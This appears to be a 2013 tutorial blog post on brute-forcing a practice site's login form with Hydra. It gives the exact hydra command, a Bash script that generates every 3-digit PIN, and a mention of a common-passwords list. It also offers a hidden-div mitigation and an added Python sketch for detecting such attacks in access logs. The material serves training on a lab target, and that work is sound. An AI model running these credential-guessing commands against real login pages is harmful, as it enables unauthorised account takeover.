Tuesday, September 24, 2013

Brute forcing a website login form using Hydra | Video

I have a new video that can get you past much more complex login forms and is easier to use, https://www.youtube.com/watch?v=OXIjNfX7BW8

In this video I show how to brute force a website's login form using the automated program Hydra. The login form that is being attacked is attack.samsclass.info/brute.htm challenge #4.

I also propose a possible mitigation by having your login success page display a hidden div at the top of the page containing the text from the failed login page. The user wouldn't see this, and hopefully when Hydra is searching for the text to know if the login was successful, it will come across this first and think it was another failed login.

Here is the actual command I used in the video. Note that uName.txt and uPass.txt point to the files on my desktop:

hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"
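Because the form is submitted with GET, every guess is written to the web server's access log with `login` and `pin` in the query string. The sketch below is an added example for defenders, not code from the video or this post: it flags any source that tries many distinct `pin` values for one login. The combined log format, the threshold, the addresses and the login names are all assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Matches the client address and request line of a common/combined log entry (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<target>\S+) HTTP/[\d.]+"')

def find_bruteforce(lines, path="/brute4.php", threshold=5):
    """Return {(ip, login): distinct_pin_count} for sources at or above threshold."""
    pins = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a GET request, or not a parseable log line
        url = urlsplit(m.group("target"))
        if url.path != path:
            continue  # some other page, e.g. the form itself
        qs = parse_qs(url.query, keep_blank_values=True)
        if "login" not in qs or "pin" not in qs:
            continue
        # Count distinct values so a user retrying the same PIN is not flagged.
        pins[(m.group("ip"), qs["login"][0])].add(qs["pin"][0])
    return {k: len(v) for k, v in pins.items() if len(v) >= threshold}

def make_sample():
    """Constructed log lines: one noisy source and one ordinary user."""
    fmt = ('{ip} - - [24/Sep/2013:10:00:{s:02d} +0000] '
           '"GET /brute4.php?login={u}&pin={p} HTTP/1.1" 200 512')
    lines = [fmt.format(ip="203.0.113.7", s=i, u="testuser", p=f"{i:03d}")
             for i in range(20)]
    # A legitimate user who mistypes once, then retries the same value twice.
    lines += [fmt.format(ip="198.51.100.4", s=30 + i, u="alice", p=p)
              for i, p in enumerate(["123", "124", "124"])]
    lines.append('198.51.100.4 - - [24/Sep/2013:10:01:00 +0000] '
                 '"GET /brute.htm HTTP/1.1" 200 900')
    return lines

if __name__ == "__main__":
    for (ip, login), n in find_bruteforce(make_sample()).items():
        print(f"{ip} tried {n} distinct pins for login {login!r}")
```

A production version would also bound the count to a time window. The same logs show that a GET login form leaves every submitted PIN in plain text on disk.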

Here is a quick Bash script to generate the 3-digit passwords:

```bash
#!/bin/bash
for i in 0 1 2 3 4 5 6 7 8 9; do
  for j in 0 1 2 3 4 5 6 7 8 9; do
    for k in 0 1 2 3 4 5 6 7 8 9; do
      echo "$i$j$k"
    done
  done
done
```

You can download the script here, but you will most likely need to run `chmod +x NumberGen.sh` on the file so that it can be executed by typing `./NumberGen.sh`. If you want the output of the script to go into a text file, use output redirection (`>`), so the terminal syntax would be `./NumberGen.sh > newFileName.txt`. Or you can just download the text file that has all 1000 numbers here.

Due to all the requests I get for a password list, I have included the 10,000 most common passwords people use. I just found the list online and I believe it is in order from most common to least.

Follow me on Twitter, @gFogerlie and Google+ https://plus.google.com/+GarrettFogerlie